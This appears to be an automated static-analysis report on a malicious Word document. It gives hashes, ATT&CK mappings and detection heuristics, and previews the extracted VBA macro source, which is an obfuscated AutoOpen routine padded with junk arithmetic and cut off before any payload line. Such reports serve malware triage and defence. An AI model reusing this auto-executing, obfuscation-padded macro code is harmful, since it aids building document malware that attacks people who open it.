Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0234040badaf071d…

MALICIOUS

Office (OLE)

Size: 560.0 KB
Created: 2017-06-28 16:15:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: cf7cf39f47df5e98c4d142f3e6f40dce
SHA-1: 0d1d51fdd95c253b88a7efbda56029144a310d55
SHA-256: 0234040badaf071d434b5a33d0f73e6ed49fdcff7a2164bda72ddd6a39d4b140
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection also confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6331107-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6331107-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
      • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
      • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
      • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
      • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
      • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
      • http://www.iec.ch (in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 81460 bytes
SHA-256: 701d05bd7a119284f0fe6385008440231624518c647c4a75c6ee20d22ecbe1da

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BfHZCs"
Sub AutoOpen()
uAQtaWmBy = -614 + 636
Select Case uAQtaWmBy
Case 9810 / 1635
jPjhTZgnA = 168
Case 495 - 476
uZ62IkbG = True
Case 47 + 7
uT0s7 = True
Case Else
pb3RcK = 168
End Select
KnMjP = -614 + 636
Select Case KnMjP
Case 9810 / 1635
lQxynO = 34094.395339746
Case 495 - 476
m92MkeSq = True
End Select
vQogye = 187 + 80
If vQogye = 9810 / 1635 Then
RksGDv = FH6D08lJs
Else
fkpRq = 34199.26947475
End If
rV3cM = RksGDv & fkpRq
KrdR9JU = 19110 / 455
Select Case KrdR9JU
Case 10145 - 10142
ExGHD = True
Case -740 + 771
zBaSd4eWj = 27778
Case 670 - 630
w7XpF = 96
Case Else
Z9NOuSZl = 60228.635483252
End Select
i1LJfPT = 19110 / 455
Select Case i1LJfPT
Case 10145 - 10142
T6DUbd1 = 48883.568023761
Case -740 + 771
kY7NR = 48883.568023761
Case 670 - 630
u9WXRC = 255
Case Else
DKDyY3RI = iGFsaT
End Select
YeR5U = 19110 / 455
Select Case YeR5U
Case 10145 - 10142
wLIhT64 = 6842
Case -740 + 771
XpzGmo = 42881.492484296
Case 670 - 630
sibNl = 36
End Select
Plq8RoV7j = 121 - 49
Select Case Plq8RoV7j
Case -3169 + 3172
ITn8lLOQA = -356693444
Case 25978 / 838
dhSfz = -27741
Case -627 + 662
b4RZH = True
End Select
iNXRl = 121 - 49
Select Case iNXRl
Case -3169 + 3172
rRClidUO = 130
End Select
Ow3VTF9M = 121 - 49
Select Case Ow3VTF9M
Case -3169 + 3172
YOPCL1BAZ = 42064.041526093
Case 25978 / 838
l6UyW7bR = 48755.761437766
Case -627 + 662
ydKgD = 74
End Select
jw7UyW = 8 + 71
Select Case jw7UyW
Case -2808 + 2810
USgqB8s = False
End Select
GO4WCu1 = 742 + 22
If GO4WCu1 = -2808 + 2810 Then
jewZI1jlN = 26446
End If
cJh97By = cJh97By & jewZI1jlN
weLMKtIER = 8 + 71
Select Case weLMKtIER
Case -2808 + 2810
yVQMLYTp0 = 170
Case -784 + 800
amRY2JX = 170
End Select
L94gJQP = 742 + 22
If L94gJQP = -2808 + 2810 Then
ueOG6Eb3 = -1694749206
End If
kMjp6 = kMjp6 & ueOG6Eb3
USiqsDwl = 8 + 71
Select Case USiqsDwl
Case -2808 + 2810
vinaej = 18560.181849477
Case -784 + 800
ncOBj0 = False
Case 259 - 204
Ie26PiM = 5582.1076778674
Case Else
BIpb94y = N3xDpQ
End Select
B3a597krJ = 256 - 136
Select Case B3a597krJ
Case -768 + 782
DnXfNGbV = True
Case 12863 / 677
yboTcIYg = pONyg9aZ
Case 1 + 50
tY4Tc = 13370
Case Else
jj7XZdcOF = 32984.985876926
End Select
Q6QcSChto = 583 + 16
If Q6QcSChto = -768 + 782 Then
ulwxK = 0
ElseIf Q6QcSChto = 12863 / 677 Then
IGbiSrLTa = 21138.122868529
Else
evhfIWpx = 8819
End If
DMQvtuHxc = ulwxK & IGbiSrLTa & evhfIWpx
ZQmOdK = 256 - 136
Select Case ZQmOdK
Case -768 + 782
VuXzI = True
End Select
MT7496 = 256 - 136
Select Case MT7496
Case -768 + 782
eRrfYt = 238
Case 12863 / 677
kGjue7DY = 238
Case 1 + 50
ucMxeF = 1231.5808959735
Case Else
qmxTdn = 61321.781155712
End Select
s19n4L = 21 + 78
Select Case s19n4L
Case 2177 - 2165
kuvBG9 = -362286442
Case 27 - 5
WEkbVqf = -362286442
Case 14792 / 344
BnPT9p = 22744
End Select
b24UtF = 1023 * 1
If b24UtF = 2177 - 2165 Then
xWJuCEf = 43606.160584505
ElseIf b24UtF = 27 - 5 Then
RntXe2q3 = 0
Else
uV7Wmh3BS = arh8M0
End If
JXMGWpm8 = xWJuCEf & RntXe2q3 & uV7Wmh3BS
wQtExu = 21 + 78
Select Case wQtExu
Case 2177 - 2165
rY1FT6P = 28922
Case 27 - 5
eMc3f = 22041.119276654
Case 14792 / 344
mZO8CPR = CpMS5Puy
Case Else
h8JkG7olh = 22041.119276654
End Select
FLXm27G = 969 - 6
If FLXm27G = 2292 - 2285 Then
qCxkB9nbw = True
ElseIf FLXm27G = 29203 / 1007 Then
FIy4FE = 43902.6955575
Else
bufEymHI = AIjLhzwrt
End If
U8QaR = qCxkB9nbw & FIy4FE & bufEymHI
jPyI8 = 969 - 6
If jPyI8 = 2292 - 2285 Then
VsgxAwSJq = 64072.017432483
ElseIf jPyI8 = 29203 / 1007 Then
fjiUEv = 64072.017432483
Else
qjI3a = DzGMsecW
End If
zwzgjAe = VsgxAwSJq & fjiUEv & qjI3a
wIVFqrW = 969 - 6
If wIVFqrW = 2292 - 2285 Then
BTdO7 = -270
ElseI
... (truncated)